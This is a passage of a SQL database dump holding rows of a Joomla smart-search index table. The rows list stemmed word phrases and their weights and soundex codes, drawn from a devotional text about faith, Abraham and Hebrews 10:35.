(250717, 'you are privileged', 'you are privileged', 0, 1, 1.6, 'Y6161423', 2, '*'),
(250718, 'you by virtue', 'you by virtue', 0, 1, 1.4333, 'Y163', 2, '*'),
(250719, 'you come face-to-face', 'you come face-to-face', 0, 1, 1.7, 'Y2512312', 2, '*'),
(250720, 'you like', 'you like', 0, 1, 1.2667, 'Y420', 2, '*'),
(250721, 'you like it', 'you like it', 0, 1, 1.3667, 'Y423', 2, '*'),
(250722, 'you must discover', 'you must discover', 0, 1, 1.5667, 'Y523216', 2, '*'),
(250723, 'you must give', 'you must give', 0, 1, 1.4333, 'Y52321', 2, '*'),
(250724, 'you must make', 'you must make', 0, 1, 1.4333, 'Y52352', 2, '*'),
(250725, 'you that is', 'you that is', 0, 1, 1.3667, 'Y320', 2, '*'),
(250726, 'you there are', 'you there are', 0, 1, 1.4333, 'Y360', 2, '*'),
(250727, 'your active', 'your active', 0, 1, 1.3667, 'Y6231', 2, '*'),
(250728, 'your active operation', 'your active operation', 0, 1, 1.7, 'Y6231635', 2, '*'),
(250729, 'your birth', 'your birth', 0, 1, 1.3333, 'Y6163', 2, '*'),
(250730, 'your birth circumstances', 'your birth circumstances', 0, 1, 1.8, 'Y616326252352', 2, '*'),
(250731, 'your calling', 'your calling', 0, 1, 1.4, 'Y62452', 3, '*'),
(250732, 'your calling don\'t', 'your calling don', 0, 1, 1.6, 'Y62452353', 2, '*'),
(250733, 'your calling raise', 'your calling raise', 0, 1, 1.6, 'Y6245262', 2, '*'),
(250734, 'your convenience', 'your convenience', 0, 1, 1.5333, 'Y625152', 2, '*'),
(250735, 'your convenience jack', 'your convenience jack', 0, 1, 1.7, 'Y625152', 2, '*'),
(250736, 'your destiny that', 'your destiny that', 0, 1, 1.5667, 'Y632353', 2, '*'),
(250737, 'your life it', 'your life it', 0, 1, 1.4, 'Y6413', 2, '*'),
(250738, 'your life whether', 'your life whether', 0, 1, 1.5667, 'Y64136', 2, '*'),
(250919, '10 35', '10 35', 0, 1, 1.1667, '', 2, '*'),
(250920, '10 35 35', '10 35 35', 0, 1, 1.2667, '', 2, '*'),
(250921, '21 05', '21 05', 0, 1, 1.1667, '', 2, '*'),
(250922, '21 05 2017', '21 05 2017', 0, 1, 1.3333, '', 2, '*'),
(250923, '35 35', '35 35', 0, 1, 1.1667, '', 2, '*'),
(250924, '35 35 therefore', '35 35 therefore', 0, 1, 1.5, 'T616', 2, '*'),
(250925, '35 therefore', '35 therefore', 0, 1, 1.4, 'T616', 2, '*'),
(250926, '35 therefore do', '35 therefore do', 0, 1, 1.5, 'T6163', 2, '*'),
(250929, 'a church then', 'a church then', 0, 1, 1.4333, 'A26235', 2, '*'),
(250930, 'a lot to', 'a lot to', 0, 1, 1.2667, 'A430', 2, '*'),
(250931, 'a son', 'a son', 0, 1, 1.1667, 'A250', 2, '*'),
(250932, 'a son even', 'a son even', 0, 1, 1.3333, 'A2515', 2, '*'),
(250933, 'ability die', 'abil die', 0, 1, 1.3667, 'A143', 2, '*'),
(250934, 'ability die god', 'abil die god', 0, 1, 1.5, 'A14323', 2, '*'),
(250935, 'able to do', 'abl to do', 0, 1, 1.3333, 'A143', 2, '*'),
(250936, 'able to give', 'abl to give', 0, 1, 1.4, 'A14321', 2, '*'),
(250937, 'able to raise', 'abl to raise', 0, 1, 1.4333, 'A14362', 2, '*'),
(250938, 'about to break', 'about to break', 0, 1, 1.4667, 'A13162', 2, '*'),
(250939, 'abraham confidently', 'abraham confidently', 0, 1, 1.6333, 'A1652513534', 2, '*'),
(250940, 'abraham confidently went', 'abraham confidently went', 0, 1, 1.8, 'A165251353453', 2, '*'),
(250941, 'abraham stood', 'abraham stood', 0, 1, 1.4333, 'A16523', 2, '*'),
(250942, 'abraham stood with', 'abraham stood with', 0, 1, 1.6, 'A16523', 2, '*'),
(250943, 'activate those words', 'activ those words', 0, 1, 1.6667, 'A23132632', 2, '*'),
(250944, 'again as', 'again as', 0, 1, 1.2667, 'A252', 2, '*'),
(250945, 'again as we', 'again as we', 0, 1, 1.3667, 'A252', 2, '*'),
(250946, 'align', 'align', 0, 0, 0.3333, 'A425', 4, '*'),
(250947, 'align with', 'align with', 0, 1, 1.3333, 'A4253', 2, '*'),
(250948, 'align with the', 'align with the', 0, 1, 1.4667, 'A4253', 2, '*'),
(250949, 'align your', 'align your', 0, 1, 1.3333, 'A4256', 4, '*'),
(250950, 'align your mouth', 'align your mouth', 0, 1, 1.5333, 'A425653', 2, '*'),
(250951, 'all these words', 'all these words', 0, 1, 1.5, 'A432632', 2, '*'),
(250952, 'all those prayer', 'all those prayer', 0, 1, 1.5333, 'A43216', 2, '*'),
(250953, 'all those words', 'all those words', 0, 1, 1.5, 'A432632', 2, '*'),
(250954, 'all your words', 'all your words', 0, 1, 1.4667, 'A4632', 2, '*'),
(250955, 'already but', 'alreadi but', 0, 1, 1.3667, 'A46313', 2, '*'),
(250956, 'already but it', 'alreadi but it', 0, 1, 1.4667, 'A46313', 2, '*'),
(250957, 'always ever', 'alwai ever', 0, 1, 1.3667, 'A4216', 2, '*'),
(250958, 'always ever able', 'alwai ever able', 0, 1, 1.5333, 'A421614', 2, '*'),
(250959, 'and ability', 'and ability', 0, 1, 1.3667, 'A53143', 2, '*'),
(250960, 'and ability die', 'and ability die', 0, 1, 1.5, 'A53143', 2, '*'),
(250961, 'and are going', 'and are going', 0, 1, 1.4333, 'A536252', 2, '*'),
(250962, 'and circumstances', 'and circumstances', 0, 1, 1.5667, 'A5326252352', 2, '*'),
(250963, 'and circumstances which', 'and circumstances which', 0, 1, 1.7667, 'A5326252352', 2, '*'),
(250964, 'and grow', 'and grow', 0, 1, 1.2667, 'A5326', 2, '*'),
(250965, 'and grow in', 'and grow in', 0, 1, 1.3667, 'A53265', 2, '*'),
(250966, 'and he had', 'and he had', 0, 1, 1.3333, 'A530', 2, '*'),
(250967, 'and let him', 'and let him', 0, 1, 1.3667, 'A53435', 2, '*'),
(250968, 'and let your', 'and let your', 0, 1, 1.4, 'A53436', 2, '*'),
(250969, 'and promises', 'and promises', 0, 1, 1.4, 'A531652', 2, '*'),
(250970, 'and promises over', 'and promises over', 0, 1, 1.5667, 'A53165216', 2, '*'),
(250971, 'and put them', 'and put them', 0, 1, 1.4, 'A53135', 2, '*'),
(250972, 'and the immutability', 'and the immutability', 0, 1, 1.6667, 'A5353143', 2, '*'),
(250973, 'and those words', 'and those words', 0, 1, 1.5, 'A532632', 2, '*'),
(250974, 'and to us', 'and to us', 0, 1, 1.3, 'A532', 2, '*'),
(250975, 'and your family', 'and your family', 0, 1, 1.5, 'A536154', 2, '*'),
(250976, 'another encounter', 'anoth encounter', 0, 1, 1.5667, 'A53652536', 2, '*'),
(250977, 'another encounter with', 'anoth encounter with', 0, 1, 1.7333, 'A536525363', 2, '*'),
(250978, 'anymore just', 'anymor just', 0, 1, 1.4, 'A5623', 2, '*'),
(250979, 'anymore just remember', 'anymor just remember', 0, 1, 1.7, 'A56236516', 2, '*'),
(250980, 'are hard', 'ar hard', 0, 1, 1.2667, 'A630', 2, '*'),
(250981, 'are hard pressed', 'ar hard pressed', 0, 1, 1.5333, 'A631623', 2, '*'),
(250982, 'as a church', 'as a church', 0, 1, 1.3667, 'A262', 2, '*'),
(250983, 'as we journey', 'as we journey', 0, 1, 1.4333, 'A265', 2, '*'),
(250984, 'away your confidence', 'awai your confidence', 0, 1, 1.6667, 'A6251352', 2, '*'),
(250985, 'be confident', 'be confident', 0, 1, 1.4, 'B251353', 2, '*'),
(250986, 'be confident in', 'be confident in', 0, 1, 1.5, 'B2513535', 2, '*'),
(250987, 'be for', 'be for', 0, 1, 1.2, 'B600', 2, '*'),
(250988, 'be for you', 'be for you', 0, 1, 1.3333, 'B600', 2, '*'),
(250989, 'be slaughtered', 'be slaughtered', 0, 1, 1.4667, 'B242363', 2, '*'),
(250990, 'be slaughtered abraham', 'be slaughtered abraham', 0, 1, 1.7333, 'B242363165', 2, '*'),
(250991, 'become reality', 'becom reality', 0, 1, 1.4667, 'B25643', 2, '*'),
(250992, 'become reality in', 'becom reality in', 0, 1, 1.5667, 'B256435', 2, '*'),
(250993, 'believing', 'believ', 0, 0, 0.6, 'B4152', 2, '*'),
(250994, 'believing that', 'believ that', 0, 1, 1.4667, 'B41523', 2, '*'),
(250995, 'believing that god', 'believ that god', 0, 1, 1.6, 'B4152323', 2, '*'),
(250996, 'beloved when', 'belov when', 0, 1, 1.4, 'B4135', 2, '*'),
(250997, 'beloved when day', 'belov when day', 0, 1, 1.5333, 'B41353', 2, '*'),
(250998, 'break that\'s', 'break that', 0, 1, 1.4, 'B6232', 2, '*'),
(250999, 'break that\'s when', 'break that when', 0, 1, 1.5667, 'B62325', 2, '*'),
(251000, 'bringing what', 'bring what', 0, 1, 1.4333, 'B652523', 2, '*'),
(251001, 'bringing what he', 'bring what he', 0, 1, 1.5333, 'B652523', 2, '*'),
(251002, 'can\'t take it', 'can take it', 0, 1, 1.4333, 'C5323', 2, '*'),
(251003, 'cancel', 'cancel', 0, 0, 0.4, 'C524', 3, '*'),
(251004, 'cancel all', 'cancel all', 0, 1, 1.3333, 'C524', 2, '*'),
(251005, 'cancel all those', 'cancel all those', 0, 1, 1.5333, 'C52432', 2, '*'),
(251006, 'cast away', 'cast away', 0, 1, 1.3, 'C300', 2, '*'),
(251007, 'cast away your', 'cast away your', 0, 1, 1.4667, 'C360', 2, '*'),
(251008, 'church then', 'church then', 0, 1, 1.3667, 'C6235', 2, '*'),
(251009, 'church then put', 'church then put', 0, 1, 1.5, 'C623513', 2, '*'),
(251010, 'circumstances which', 'circumst which', 0, 1, 1.6333, 'C6252352', 2, '*'),
(251011, 'circumstances which seem', 'circumst which seem', 0, 1, 1.8, 'C62523525', 2, '*'),
(251012, 'committed to bringing', 'commit to bringing', 0, 1, 1.7, 'C53165252', 2, '*'),
(251013, 'confess them', 'confess them', 0, 1, 1.4, 'C51235', 2, '*'),
(251014, 'confess them recite', 'confess them recite', 0, 1, 1.6333, 'C51235623', 2, '*'),
(251015, 'confess those', 'confess those', 0, 1, 1.4333, 'C51232', 2, '*'),
(251016, 'confess those covenants', 'confess those covenants', 0, 1, 1.7667, 'C512321532', 2, '*'),
(251017, 'confidence in flesh', 'confid in flesh', 0, 1, 1.6333, 'C513525142', 2, '*'),
(251018, 'confidence in god\'s', 'confid in god', 0, 1, 1.6333, 'C513525232', 2, '*'),
(251019, 'confidence in him', 'confid in him', 0, 1, 1.5667, 'C513525', 3, '*'),
(251020, 'confidence in that', 'confid in that', 0, 1, 1.6, 'C5135253', 2, '*'),
(251021, 'confidence in yourself', 'confid in yourself', 0, 1, 1.7333, 'C5135256241', 2, '*'),
(251022, 'confidence stay', 'confid stay', 0, 1, 1.5, 'C513523', 2, '*'),
(251023, 'confidence stay and', 'confid stay and', 0, 1, 1.6333, 'C51352353', 2, '*'),
(251024, 'confidence unwavering', 'confid unwavering', 0, 1, 1.7, 'C5135251652', 2, '*'),
(251025, 'confidence unwavering in', 'confid unwavering in', 0, 1, 1.8, 'C51352516525', 2, '*'),
(251026, 'confidence which', 'confid which', 0, 1, 1.5333, 'C51352', 2, '*'),
(251027, 'confidence which has', 'confid which has', 0, 1, 1.6667, 'C51352', 2, '*'),
(251028, 'confident', 'confid', 0, 0, 0.6, 'C51353', 2, '*'),
(251029, 'confident in', 'confid in', 0, 1, 1.4, 'C513535', 2, '*'),
(251030, 'confident in god\'s', 'confid in god', 0, 1, 1.6, 'C513535232', 2, '*'),
(251031, 'confidently went', 'confid went', 0, 1, 1.5333, 'C51353453', 2, '*'),
(251032, 'confidently went to', 'confid went to', 0, 1, 1.6333, 'C51353453', 2, '*'),
(251033, 'covenants and', 'coven and', 0, 1, 1.4333, 'C153253', 2, '*'),
(251034, 'covenants and promises', 'coven and promises', 0, 1, 1.7333, 'C1532531652', 2, '*'),
(251035, 'covenants that', 'coven that', 0, 1, 1.4667, 'C15323', 2, '*'),
(251036, 'covenants that god', 'coven that god', 0, 1, 1.6, 'C1532323', 2, '*'),
(251037, 'daily confess', 'daili confess', 0, 1, 1.4333, 'D42512', 2, '*'),
(251038, 'daily confess those', 'daili confess those', 0, 1, 1.6333, 'D4251232', 2, '*'),
(251039, 'darkest', 'darkest', 0, 0, 0.4667, 'D623', 2, '*'),
(251040, 'darkest when', 'darkest when', 0, 1, 1.4, 'D6235', 2, '*'),
(251041, 'darkest when it', 'darkest when it', 0, 1, 1.5, 'D62353', 2, '*'),
(251042, 'day confess', 'dai confess', 0, 1, 1.3667, 'D2512', 2, '*'),
(251043, 'day confess them', 'dai confess them', 0, 1, 1.5333, 'D251235', 2, '*'),
(251044, 'day is', 'dai is', 0, 1, 1.2, 'D200', 3, '*'),
(251045, 'day is about', 'dai is about', 0, 1, 1.4, 'D213', 2, '*'),
(251046, 'dead and', 'dead and', 0, 1, 1.2667, 'D530', 2, '*'),
(251047, 'dead and he', 'dead and he', 0, 1, 1.3667, 'D530', 2, '*'),
(251048, 'declare them', 'declar them', 0, 1, 1.4, 'D24635', 2, '*'),
(251049, 'declare them pray', 'declar them pray', 0, 1, 1.5667, 'D2463516', 2, '*'),
(251050, 'demanded isaac', 'demand isaac', 0, 1, 1.4667, 'D532', 2, '*'),
(251051, 'demanded isaac to', 'demand isaac to', 0, 1, 1.5667, 'D5323', 2, '*'),
(251052, 'devil will try', 'devil will try', 0, 1, 1.4667, 'D1436', 2, '*'),
(251053, 'die god', 'die god', 0, 1, 1.2333, 'D230', 2, '*'),
(251054, 'die god is', 'die god is', 0, 1, 1.3333, 'D232', 2, '*'),
(251055, 'die no', 'die no', 0, 1, 1.2, 'D500', 2, '*'),
(251056, 'die no matter', 'die no matter', 0, 1, 1.4333, 'D536', 2, '*'),
(251057, 'do even when', 'do even when', 0, 1, 1.4, 'D150', 2, '*'),
(251058, 'do not cast', 'do not cast', 0, 1, 1.3667, 'D5323', 2, '*'),
(251059, 'do what he', 'do what he', 0, 1, 1.3333, 'D000', 2, '*'),
(251060, 'don\'t even put', 'don even put', 0, 1, 1.4667, 'D531513', 2, '*'),
(251061, 'don\'t put', 'don put', 0, 1, 1.3, 'D5313', 2, '*'),
(251062, 'don\'t put your', 'don put your', 0, 1, 1.4667, 'D53136', 2, '*'),
(251063, 'encounter with', 'encount with', 0, 1, 1.4667, 'E525363', 3, '*'),
(251064, 'encounter with god', 'encount with god', 0, 1, 1.6, 'E52536323', 2, '*'),
(251065, 'even in the', 'even in the', 0, 1, 1.3667, 'E153', 2, '*'),
(251066, 'even put', 'even put', 0, 1, 1.2667, 'E1513', 2, '*'),
(251067, 'even put your', 'even put your', 0, 1, 1.4333, 'E15136', 2, '*'),
(251068, 'even when god', 'even when god', 0, 1, 1.4333, 'E1523', 2, '*'),
(251069, 'ever able', 'ever able', 0, 1, 1.3, 'E1614', 2, '*'),
(251070, 'ever able to', 'ever able to', 0, 1, 1.4, 'E16143', 2, '*'),
(251071, 'every day', 'everi day', 0, 1, 1.3, 'E163', 2, '*'),
(251072, 'every day confess', 'everi day confess', 0, 1, 1.5667, 'E1632512', 2, '*'),
(251073, 'everything become', 'everyth become', 0, 1, 1.5667, 'E16352125', 2, '*'),
(251074, 'everything become reality', 'everyth become reality', 0, 1, 1.8333, 'E16352125643', 2, '*'),
(251075, 'face of negative', 'face of negative', 0, 1, 1.5333, 'F215231', 2, '*'),
(251076, 'family you', 'famili you', 0, 1, 1.3333, 'F540', 2, '*'),
(251077, 'family you should', 'famili you should', 0, 1, 1.5667, 'F54243', 2, '*'),
(251078, 'father has spoken', 'father has spoken', 0, 1, 1.5667, 'F362125', 2, '*'),
(251079, 'father\'s heart 21', 'father heart 21', 0, 1, 1.5667, 'F36263', 2, '*'),
(251080, 'flesh in', 'flesh in', 0, 1, 1.2667, 'F425', 2, '*'),
(251081, 'flesh in men', 'flesh in men', 0, 1, 1.4, 'F425', 2, '*'),
(251082, 'for us already', 'for us already', 0, 1, 1.4667, 'F62463', 2, '*'),
(251083, 'for you the', 'for you the', 0, 1, 1.3667, 'F630', 2, '*'),
(251084, 'future is', 'futur is', 0, 1, 1.3, 'F362', 2, '*'),
(251085, 'future is loaded', 'futur is loaded', 0, 1, 1.5333, 'F36243', 2, '*'),
(251086, 'future will', 'futur will', 0, 1, 1.3667, 'F364', 2, '*'),
(251087, 'future will be', 'futur will be', 0, 1, 1.4667, 'F3641', 2, '*'),
(251088, 'get all', 'get all', 0, 1, 1.2333, 'G340', 2, '*'),
(251089, 'get all these', 'get all these', 0, 1, 1.4333, 'G3432', 2, '*'),
(251090, 'give him', 'give him', 0, 1, 1.2667, 'G150', 2, '*'),
(251091, 'give him a', 'give him a', 0, 1, 1.3333, 'G150', 2, '*'),
(251092, 'god and let', 'god and let', 0, 1, 1.3667, 'G35343', 2, '*'),
(251093, 'god and you', 'god and you', 0, 1, 1.3667, 'G353', 3, '*'),
(251094, 'god be confident', 'god be confident', 0, 1, 1.5333, 'G31251353', 2, '*'),
(251095, 'god demanded', 'god demanded', 0, 1, 1.4, 'G353', 2, '*'),
(251096, 'god demanded isaac', 'god demanded isaac', 0, 1, 1.6, 'G3532', 2, '*'),
(251097, 'god has prepared', 'god has prepared', 0, 1, 1.5333, 'G3216163', 2, '*'),
(251098, 'god is committed', 'god is committed', 0, 1, 1.5333, 'G3253', 4, '*'),
(251099, 'god that god', 'god that god', 0, 1, 1.4, 'G323', 2, '*'),
(251100, 'god the father', 'god the father', 0, 1, 1.4667, 'G3136', 2, '*'),
(251101, 'god was able', 'god was able', 0, 1, 1.4, 'G3214', 2, '*'),
(251102, 'god\'s immutability', 'god immutability', 0, 1, 1.6, 'G3253143', 2, '*'),
(251103, 'god\'s immutability and', 'god immutability and', 0, 1, 1.7333, 'G325314353', 2, '*'),
(251104, 'god\'s promise', 'god promise', 0, 1, 1.4333, 'G321652', 2, '*'),
(251105, 'god\'s promise don\'t', 'god promise don', 0, 1, 1.6333, 'G321652353', 2, '*'),
(251106, 'going through tough', 'go through tough', 0, 1, 1.6333, 'G5236232', 2, '*'),
(251107, 'great reward', 'great reward', 0, 1, 1.4, 'G6363', 2, '*'),
(251108, 'great reward till', 'great reward till', 0, 1, 1.5667, 'G63634', 2, '*'),
(251109, 'grow in god\'s', 'grow in god', 0, 1, 1.4333, 'G65232', 2, '*'),
(251110, 'had another', 'had another', 0, 1, 1.3667, 'H3536', 2, '*'),
(251111, 'had another encounter', 'had another encounter', 0, 1, 1.7, 'H353652536', 2, '*'),
(251112, 'happens even', 'happen even', 0, 1, 1.4, 'H15215', 2, '*'),
(251113, 'happens even in', 'happen even in', 0, 1, 1.5, 'H15215', 2, '*'),
(251114, 'hard pressed', 'hard pressed', 0, 1, 1.4, 'H631623', 2, '*'),
(251115, 'hard pressed and', 'hard pressed and', 0, 1, 1.5333, 'H63162353', 2, '*'),
(251116, 'has great', 'ha great', 0, 1, 1.3, 'H263', 2, '*'),
(251117, 'has great reward', 'ha great reward', 0, 1, 1.5333, 'H26363', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(251118, 'has made with', 'ha made with', 0, 1, 1.4333, 'H253', 2, '*'),
(251119, 'has said to', 'ha said to', 0, 1, 1.3667, 'H230', 2, '*'),
(251120, 'has spoken a', 'ha spoken a', 0, 1, 1.4, 'H2125', 2, '*'),
(251121, 'he had another', 'he had another', 0, 1, 1.4667, 'H3536', 2, '*'),
(251122, 'he said he', 'he said he', 0, 1, 1.3333, 'H230', 2, '*'),
(251123, 'he said to', 'he said to', 0, 1, 1.3333, 'H230', 2, '*'),
(251124, 'he would', 'he would', 0, 1, 1.2667, 'H430', 3, '*'),
(251125, 'he would do', 'he would do', 0, 1, 1.3667, 'H430', 2, '*'),
(251126, 'heart 21', 'heart 21', 0, 1, 1.2667, 'H630', 2, '*'),
(251127, 'heart 21 05', 'heart 21 05', 0, 1, 1.3667, 'H630', 2, '*'),
(251128, 'heart stay', 'heart stay', 0, 1, 1.3333, 'H6323', 2, '*'),
(251129, 'heart stay in', 'heart stay in', 0, 1, 1.4333, 'H63235', 2, '*'),
(251130, 'heaven over us', 'heaven over us', 0, 1, 1.4667, 'H15162', 2, '*'),
(251131, 'hebrews 10', 'hebrew 10', 0, 1, 1.3333, 'H162', 2, '*'),
(251132, 'hebrews 10 35', 'hebrew 10 35', 0, 1, 1.4333, 'H162', 2, '*'),
(251133, 'him a son', 'him a son', 0, 1, 1.3, 'H525', 2, '*'),
(251134, 'him never wave', 'him never wave', 0, 1, 1.4667, 'H5161', 2, '*'),
(251135, 'him work', 'him work', 0, 1, 1.2667, 'H562', 2, '*'),
(251136, 'him work hebrews', 'him work hebrews', 0, 1, 1.5333, 'H562162', 2, '*'),
(251137, 'his confidence', 'hi confidence', 0, 1, 1.4667, 'H251352', 2, '*'),
(251138, 'his confidence unwavering', 'hi confidence unwavering', 0, 1, 1.8333, 'H25135251652', 2, '*'),
(251139, 'his word be', 'hi word be', 0, 1, 1.3667, 'H2631', 2, '*'),
(251140, 'how the future', 'how the future', 0, 1, 1.4667, 'H3136', 2, '*'),
(251141, 'immutability', 'immut', 0, 0, 0.8, 'I53143', 2, '*'),
(251142, 'immutability and', 'immut and', 0, 1, 1.5333, 'I5314353', 2, '*'),
(251143, 'immutability and the', 'immut and the', 0, 1, 1.6667, 'I5314353', 2, '*'),
(251144, 'immutability of', 'immut of', 0, 1, 1.5, 'I531431', 2, '*'),
(251145, 'immutability of his', 'immut of his', 0, 1, 1.6333, 'I5314312', 2, '*'),
(251146, 'in flesh', 'in flesh', 0, 1, 1.2667, 'I5142', 2, '*'),
(251147, 'in flesh in', 'in flesh in', 0, 1, 1.3667, 'I51425', 2, '*'),
(251148, 'in god that', 'in god that', 0, 1, 1.3667, 'I523', 2, '*'),
(251149, 'in god\'s immutability', 'in god immutability', 0, 1, 1.7, 'I523253143', 2, '*'),
(251150, 'in god\'s promise', 'in god promise', 0, 1, 1.5333, 'I52321652', 2, '*'),
(251151, 'in god\'s word', 'in god word', 0, 1, 1.4333, 'I523263', 2, '*'),
(251152, 'in him never', 'in him never', 0, 1, 1.4, 'I516', 2, '*'),
(251153, 'in life beloved', 'in life beloved', 0, 1, 1.5, 'I541413', 2, '*'),
(251154, 'in men', 'in men', 0, 1, 1.2, 'I500', 2, '*'),
(251155, 'in men or', 'in men or', 0, 1, 1.3, 'I560', 2, '*'),
(251156, 'in that word', 'in that word', 0, 1, 1.4, 'I5363', 2, '*'),
(251157, 'in the face', 'in the face', 0, 1, 1.3667, 'I5312', 2, '*'),
(251158, 'in things don\'t', 'in things don', 0, 1, 1.5, 'I5352353', 2, '*'),
(251159, 'in yourself just', 'in yourself just', 0, 1, 1.5333, 'I5624123', 2, '*'),
(251160, 'is always ever', 'is always ever', 0, 1, 1.4667, 'I24216', 2, '*'),
(251161, 'is committed', 'is committed', 0, 1, 1.4, 'I253', 4, '*'),
(251162, 'is committed to', 'is committed to', 0, 1, 1.5, 'I253', 4, '*'),
(251163, 'is darkest', 'is darkest', 0, 1, 1.3333, 'I23623', 2, '*'),
(251164, 'is darkest when', 'is darkest when', 0, 1, 1.5, 'I236235', 2, '*'),
(251165, 'is loaded', 'is loaded', 0, 1, 1.3, 'I243', 2, '*'),
(251166, 'is loaded for', 'is loaded for', 0, 1, 1.4333, 'I24316', 2, '*'),
(251167, 'is your key', 'is your key', 0, 1, 1.3667, 'I262', 2, '*'),
(251168, 'isaac to', 'isaac to', 0, 1, 1.2667, 'I230', 2, '*'),
(251169, 'isaac to be', 'isaac to be', 0, 1, 1.3667, 'I231', 2, '*'),
(251170, 'it anymore', 'it anymore', 0, 1, 1.3333, 'I356', 2, '*'),
(251171, 'it anymore just', 'it anymore just', 0, 1, 1.5, 'I35623', 2, '*'),
(251174, 'journey on', 'journei on', 0, 1, 1.3333, 'J650', 2, '*'),
(251175, 'journey on with', 'journei on with', 0, 1, 1.5, 'J653', 2, '*'),
(251176, 'just let your', 'just let your', 0, 1, 1.4333, 'J3436', 2, '*'),
(251177, 'just remember', 'just remember', 0, 1, 1.4333, 'J36516', 2, '*'),
(251178, 'just remember what', 'just remember what', 0, 1, 1.6, 'J365163', 2, '*'),
(251180, 'key to the', 'kei to the', 0, 1, 1.3333, 'K300', 2, '*'),
(251181, 'let all', 'let all', 0, 1, 1.2333, 'L340', 2, '*'),
(251182, 'let all your', 'let all your', 0, 1, 1.4, 'L346', 2, '*'),
(251183, 'let him work', 'let him work', 0, 1, 1.4, 'L3562', 2, '*'),
(251184, 'let your confidence', 'let your confidence', 0, 1, 1.6333, 'L36251352', 2, '*'),
(251185, 'let your trust', 'let your trust', 0, 1, 1.4667, 'L363623', 2, '*'),
(251186, 'life beloved', 'life beloved', 0, 1, 1.4, 'L1413', 2, '*'),
(251187, 'life beloved when', 'life beloved when', 0, 1, 1.5667, 'L14135', 2, '*'),
(251188, 'life god has', 'life god has', 0, 1, 1.4, 'L1232', 2, '*'),
(251189, 'life let all', 'life let all', 0, 1, 1.4, 'L1434', 2, '*'),
(251190, 'life this will', 'life this will', 0, 1, 1.4667, 'L1324', 2, '*'),
(251191, 'like you can\'t', 'like you can', 0, 1, 1.4667, 'L253', 2, '*'),
(251192, 'loaded', 'load', 0, 0, 0.4, 'L300', 2, '*'),
(251193, 'loaded for', 'load for', 0, 1, 1.3333, 'L316', 2, '*'),
(251194, 'loaded for us', 'load for us', 0, 1, 1.4333, 'L3162', 2, '*'),
(251195, 'looks like you', 'look like you', 0, 1, 1.4667, 'L242', 2, '*'),
(251196, 'lord die', 'lord die', 0, 1, 1.2667, 'L630', 2, '*'),
(251197, 'lord die no', 'lord die no', 0, 1, 1.3667, 'L635', 2, '*'),
(251198, 'lot to', 'lot to', 0, 1, 1.2, 'L300', 2, '*'),
(251199, 'lot to us', 'lot to us', 0, 1, 1.3, 'L320', 2, '*'),
(251200, 'made with us', 'made with us', 0, 1, 1.4, 'M320', 2, '*'),
(251201, 'make you cancel', 'make you cancel', 0, 1, 1.5, 'M2524', 2, '*'),
(251202, 'matter what happens', 'matter what happens', 0, 1, 1.6333, 'M363152', 2, '*'),
(251203, 'men or', 'men or', 0, 1, 1.2, 'M600', 2, '*'),
(251204, 'men or in', 'men or in', 0, 1, 1.3, 'M650', 2, '*'),
(251205, 'mountain', 'mountain', 0, 0, 0.5333, 'M350', 2, '*'),
(251206, 'mountain believing', 'mountain believing', 0, 1, 1.6, 'M3514152', 2, '*'),
(251207, 'mountain believing that', 'mountain believing that', 0, 1, 1.7667, 'M35141523', 2, '*'),
(251208, 'mouth with', 'mouth with', 0, 1, 1.3333, 'M300', 2, '*'),
(251209, 'mouth with your', 'mouth with your', 0, 1, 1.5, 'M360', 2, '*'),
(251210, 'must align', 'must align', 0, 1, 1.3333, 'M23425', 2, '*'),
(251211, 'must align your', 'must align your', 0, 1, 1.5, 'M234256', 2, '*'),
(251212, 'negative situations', 'neg situations', 0, 1, 1.6333, 'N2312352', 2, '*'),
(251213, 'negative situations and', 'neg situations and', 0, 1, 1.7667, 'N231235253', 2, '*'),
(251214, 'never let', 'never let', 0, 1, 1.3, 'N1643', 2, '*'),
(251215, 'never let your', 'never let your', 0, 1, 1.4667, 'N16436', 2, '*'),
(251216, 'never wave', 'never wave', 0, 1, 1.3333, 'N161', 2, '*'),
(251217, 'night is darkest', 'night is darkest', 0, 1, 1.5333, 'N2323623', 2, '*'),
(251218, 'not cast away', 'not cast away', 0, 1, 1.4333, 'N323', 2, '*'),
(251219, 'of god be', 'of god be', 0, 1, 1.3, 'O1231', 2, '*'),
(251220, 'of his word', 'of his word', 0, 1, 1.3667, 'O1263', 2, '*'),
(251221, 'of negative situations', 'of negative situations', 0, 1, 1.7333, 'O152312352', 2, '*'),
(251222, 'on with', 'on with', 0, 1, 1.2333, 'O530', 2, '*'),
(251223, 'on with god', 'on with god', 0, 1, 1.3667, 'O5323', 2, '*'),
(251224, 'or in things', 'or in things', 0, 1, 1.4, 'O65352', 2, '*'),
(251225, 'over the years', 'over the years', 0, 1, 1.4667, 'O16362', 2, '*'),
(251226, 'over us', 'over us', 0, 1, 1.2333, 'O162', 2, '*'),
(251227, 'over us get', 'over us get', 0, 1, 1.3667, 'O1623', 2, '*'),
(251228, 'over yourself', 'over yourself', 0, 1, 1.4333, 'O16241', 2, '*'),
(251229, 'over yourself and', 'over yourself and', 0, 1, 1.5667, 'O1624153', 2, '*'),
(251230, 'over yourself every', 'over yourself every', 0, 1, 1.6333, 'O162416', 2, '*'),
(251231, 'pass don\'t', 'pass don', 0, 1, 1.3333, 'P2353', 2, '*'),
(251232, 'pass don\'t put', 'pass don put', 0, 1, 1.4667, 'P235313', 2, '*'),
(251233, 'patient and let', 'patient and let', 0, 1, 1.5, 'P3535343', 2, '*'),
(251234, 'personally through', 'person through', 0, 1, 1.6, 'P6254362', 2, '*'),
(251235, 'personally through his', 'person through his', 0, 1, 1.7333, 'P6254362', 2, '*'),
(251236, 'points again', 'point again', 0, 1, 1.4, 'P5325', 2, '*'),
(251237, 'points again as', 'point again as', 0, 1, 1.5, 'P53252', 2, '*'),
(251238, 'pray all', 'prai all', 0, 1, 1.2667, 'P640', 2, '*'),
(251239, 'pray all those', 'prai all those', 0, 1, 1.4667, 'P6432', 2, '*'),
(251240, 'prayer points again', 'prayer points again', 0, 1, 1.6333, 'P615325', 2, '*'),
(251241, 'pressed', 'press', 0, 0, 0.4667, 'P623', 2, '*'),
(251242, 'pressed and', 'press and', 0, 1, 1.3667, 'P62353', 2, '*'),
(251243, 'pressed and are', 'press and are', 0, 1, 1.5, 'P623536', 2, '*'),
(251244, 'promise don\'t', 'promis don', 0, 1, 1.4333, 'P652353', 2, '*'),
